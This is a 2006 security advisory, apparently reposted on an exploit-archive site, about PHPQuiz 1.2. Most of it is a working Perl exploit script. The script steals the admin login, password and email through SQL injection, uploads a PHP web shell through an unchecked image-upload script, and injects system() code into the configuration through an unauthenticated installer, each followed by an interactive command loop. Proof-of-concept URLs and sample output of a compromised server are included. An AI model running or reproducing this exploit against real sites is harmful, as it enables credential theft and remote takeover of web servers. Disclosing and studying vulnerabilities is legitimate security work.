PHPQuiz Multiple Remote Vulnerabilites

2006.09.26
Credit: Simo64
Risk: High
Local: No
Remote: Yes
CWE: N/A

###################################################### # # Title: PHPQuiz <= v.1.2 Remote SQL injection/Code Execution Exploit # Vendor : PHPQuiz # webiste : http://www.phpquiz.com # Version : <= v.1.2 # Severity: Critical # Author: Simo64 / simo64_at_morx_org # MorX Security Reseach Team # http://www.morx.org # http://www.morx.org/phpquiz.txt # # Details : # # SQL injection #*************************** # # univers var in score.php and quiz_id var in home.php are not proprely verified and can be used to inject query # # PoC : http://localhost/phpquiz/front/?what=score&univers=[SQL] # http://localhost/phpquiz/front/?quiz=quiz&univers=1&step=1&quiz_id=[SQL] # # Arbitary File Upload #********************** # vulnerable code in back/upload_img.php and admin/upload_img.php near lines 74-76 # # 74 if (($upload) && ($ok_update == "yes")) { # 75 # 76 if(@copy($image, $path)){ # 77 ..... # # $upload , $ok_update , $image , $path variables are not sanitized and can be used to upload files # # PoC Exploit : # # <form enctype="multipart/form-data" method="post" action="http://localhost/phpquiz/back/upload_img.php?upload=1&ok_update= yes&path=./../img_quiz/l3ez.php"> # Download File<br> # <input name="image" type="file" size="20"><br> # <input type="submit" name="upload" value="Upload"><form> # # phpquiz/img_quiz/ folder is by defaut writable so after uploading a simple phpshell <?passthru($cmd);?> # # we can lanche cmd from : http://localhost/phpquiz/img_quiz/l3ez.php?cmd=ls # # PHP Code Injection #******************** # # cfgphpquiz/install.php is accessible without authentification , the script is used to # save configuration setting in config.inc.php. # # Impact: # any remote user can post php code to the vulnerable file, view current configuration which contains sensitive information # such as admin password (plain text) and login # #*********************************************************************** ************ # # simo64@localhost:~$ phpquiz.pl morx.org /phpquiz/ 1 # # /-----------------------------------------------------------# | PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit | # | Coded by simo64 - simo64_morx.org | # | www.morx.org | # |-----------------------------------------------------------| # | MorX Security Research Team &copy; | # -----------------------------------------------------------/ # # Connecting to www.morx.org ... Connected ! # # [+] Injecting credentials # # Sending Data ... # # SQL injection Succeded ! # # User EMail : admin (at) morx (dot) org [email concealed] # User Login : admin # User Passwd : password # # [+] Exec CMD by uploading a shell Connected ! # # Uploading shell ... [OK] # # Checking if successfully Uploaded .... [OK] # # NOW YOU CAN LAUNCH COMMANDS # # simo64[at]morx.org :~$ id # uid=48(apache) gid=48(apache) groups=48(apache),2522(psaserv) # simo64[at]morx.org :~$ pwd # /home/morx/public_html/phpquiz/img_quiz # simo64[at]morx.org :~$ ls # id_1.gif # id_2.gif # id_3.gif # id_4.gif # index.php # zaz.php # simo64[at]morx.org :~$ exit # #!/usr/bin/perl use IO::Socket ; use LWP::Simple ; print q( /-----------------------------------------------------------| PHPQuiz v.1.2 Remote SQL injection/Code Execution Exploit | | Coded by simo64 - simo64_morx.org | | www.morx.org | |-----------------------------------------------------------| | MorX Security Research Team &copy; | -----------------------------------------------------------/ ); sub usage(){ print "nUsage :perl $0 siteurl /path/ useridn"; print "nExemple : perl $0 phpquiz.com /phpquiz/ 1n"; } if(!@ARGV){ &usage(); exit(0) } $host = $ARGV[0]; $path = $ARGV[1]; $uid = $ARGV[2]; $success = null ; $injected = 0; $injcheck = $path."cfgphpquiz/config.inc.php?xD=l3fou"; $phpinject = $path."cfgphpquiz/install.php?submit=Valider&config_alert_email_name=%22 ;echo%20@$xD;@system($morx);//MorX%20RulZ%20=)"; $injectuser = "front/?what=score&univers=-64%20UNION%20SELECT%20null,LOGIN,null,null,n ull,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*"; $injectpass = "front/?what=score&univers=-64%20UNION%20SELECT%20null,PWD,null,null,nul l,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*"; $injectmail = "front/?what=score&univers=-64%20UNION%20SELECT%20null,EMAIL,null,null,n ull,null,null,null,null,null%20FROM%20user%20WHERE%20ID=$uid/*"; syswrite STDOUT , "Connecting to $host ..."; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "nnUnable to connect to $host " unless($sock) ; syswrite STDOUT , "tConnected !nn[+] Injecting credentialsnnSending Data ..."; print $sock "GET $path$injectmail HTTP/1.1n"; print $sock "Host: $hostn"; print $sock "Connection: Closenn"; while($res = <$sock>){ if($res =~ /anim_fleche_droite.gif" border="0">"(.*?)"</a>/){ $usermail = $1 ; $success = "ok" ; } } if($success eq "ok") { syswrite STDOUT , "nnSQL injection Succeded !nn"; sleep 2 ; syswrite STDOUT , "tUser EMail : $usermailn"; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); print $sock "GET $path$injectuser HTTP/1.1n"; print $sock "Host: $hostn"; print $sock "Connection: Closenn"; while($res = <$sock>){ if($res =~ />"(.*?)"/){ $userlogin = $1 ; } } syswrite STDOUT , "tUser Login : $userloginn"; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); print $sock "GET $path$injectpass HTTP/1.1n"; print $sock "Host: $hostn"; print $sock "Connection: Closenn"; while($res = <$sock>){ if($res =~ />"(.*?)"/){ $userpass = $1 ; } } syswrite STDOUT , "tUser Passwd : $userpassnn"; } else {print "nnInjecting credentials Exploit Failed !nn";} sleep 2; # PART2 Remote Command Execution by uploaing shell syswrite STDOUT , "n[+] Exec CMD by uploading a shell"; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "nnUnable to connect to $host " unless($sock) ; syswrite STDOUT , "tConnected !nn"; syswrite STDOUT , "Uploading shell ..."; $data='-----------------------------7d61592213049c Content-Disposition: form-data; name="dir" / -----------------------------7d61592213049c Content-Disposition: form-data; name="image"; filename="zaz.php" Content-Type: text/plain <?php if (get_magic_quotes_gpc()){$_GET['cmd']=stripslashes($_GET['cmd']);} passthru($_GET['cmd']); ?> -----------------------------7d61592213049c Content-Disposition: form-data; name="submit" Upload -----------------------------7d61592213049c-- '; $script = $path."/back/upload_img.php?upload=1&ok_update=yes&path=./../img_quiz/za z.php"; $len = length $data ; print $sock "POST $script HTTP/1.0rn"; print $sock "Content-Type: multipart/form-data; boundary=---------------------------7d61592213049crn"; print $sock "Host: $hostrn"; print $sock "Content-Length: $lenrn"; print $sock "Connection: closernrn"; print $sock $data; syswrite STDOUT , "t[OK]nnChecking if successfully Uploaded .... "; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); print $sock "HEAD $path"."img_quiz/zaz.php HTTP/1.0rn"; print $sock "Host: $hostrn"; print $sock "Connection: closenn"; while($rep = <$sock>){ if($rep =~ /HTTP/1.1 200 OK/) { $success = 1; } } if($success == 1){ print "t[OK]nnttNOW YOU CAN LAUNCH COMMANDSnn"; while(){ print "simo64[at]morx.org :~$ "; chop($cmd=<STDIN>); exit() if ($cmd eq 'exit'); $result = get("http://$host".$path."img_quiz/zaz.php?cmd=$cmd"); print $result; } } else { print "tFailed !nnFile Upload Failednn" } # STEP 3 Injecting PHPcode into config.inc.php file print "n[+] Injecting PHP Code......nnConnecting ...."; my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die "Connot Connect to $host !" unless($sock); print "tConnected !nnSending Data ....t"; print $sock "GET $phpinject HTTP/1.1n"; print $sock "Host: $hostn"; print $sock "Content-Type: application/x-www-form-urlencodedn"; print $sock "User-Agent: MorX-Zillan"; print $sock "Connection: Closenn"; print "t OKnnChecking if code injected ..."; my $sock = new IO::Socket::INET (PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); print $sock "GET $injcheck HTTP/1.1n"; print $sock "Host: $hostn"; print $sock "Content-Type: application/x-www-form-urlencodedn"; print $sock "User-Agent: MorX-Zillan"; print $sock "Connection: Closenn"; while($check = <$sock>){ if($check =~ /l3fou/) { $injected = 1; } } if($injected == 1 ){ print "tSucceded !nntNOW YOU ARE IN !nn"; while(){ print "simo@morx.org :~$ "; $cmd = <STDIN>; chop($cmd); exit(0) if($cmd eq "exit"); $result = get("http://".$host.$path."cfgphpquiz/config.inc.php?morx=$cmd"); print $result; } } else {print "tFailednnPHPCode Injection Failed !nn";}


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top